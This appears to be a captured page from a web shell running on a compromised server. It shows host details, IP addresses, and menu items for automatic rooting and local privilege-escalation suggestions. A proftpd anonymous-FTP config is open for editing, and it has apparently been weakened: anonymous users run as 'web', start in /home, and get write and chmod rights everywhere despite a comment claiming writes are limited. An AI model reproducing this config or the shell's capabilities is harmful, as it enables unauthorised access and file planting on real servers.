Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.119.110.128
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
etc /
proftpd /
Delete
Unzip
Name
Size
Permission
Date
Action
conf.d
[ DIR ]
drwxr-xr-x
2020-11-24 21:41
anonftp.conf
1.91
KB
-rw-r-----
2021-02-10 14:54
mod_ban.conf
597
B
-rw-r-----
2020-11-24 21:40
mod_qos.conf
359
B
-rw-r-----
2020-11-24 21:40
mod_tls.conf
604
B
-rw-r-----
2020-11-24 21:40
modules.conf
6.83
KB
-rw-r-----
2020-11-24 21:40
Save
Rename
# A basic anonymous configuration, with an upload directory # Enable this with PROFTPD_OPTIONS=-DANONYMOUS_FTP in /etc/sysconfig/proftpd <Anonymous ~ftp> User web Group web AccessGrantMsg "Anonymous login ok, restrictions apply." # We want clients to be able to login with "anonymous" as well as "ftp" #UserAlias anonymous ftp # Limit the maximum number of anonymous logins MaxClients 10 "Sorry, max %m users -- try again later" # Put the user into /pub right after login DefaultChdir /home # We want 'welcome.msg' displayed at login, '.message' displayed in # each newly chdired directory and tell users to read README* files. DisplayLogin /welcome.msg DisplayChdir .message DisplayReadme README* # Cosmetic option to make all files appear to be owned by user "ftp" DirFakeUser on web DirFakeGroup on web # Limit WRITE everywhere in the anonymous chroot <Limit WRITE SITE_CHMOD> AllowAll </Limit> # An upload directory that allows storing files but not retrieving # or creating directories. # # Directory specification is slightly different if mod_vroot is in # use: see http://sourceforge.net/p/proftp/mailman/message/31728570/ # https://bugzilla.redhat.com/show_bug.cgi?id=1045922 <IfModule mod_vroot.c> <Directory /uploads/*> AllowOverwrite yes <Limit READ> AllowAll </Limit> <Limit STOR> AllowAll </Limit> </Directory> </IfModule> <IfModule !mod_vroot.c> <Directory uploads/*> AllowOverwrite yes <Limit READ> AllowAll </Limit> <Limit STOR> AllowAll </Limit> </Directory> </IfModule> # Don't write anonymous accesses to the system wtmp file (good idea!) WtmpLog off # Logging for the anonymous transfers ExtendedLog /var/log/proftpd/access.log WRITE,READ default ExtendedLog /var/log/proftpd/auth.log AUTH auth </Anonymous>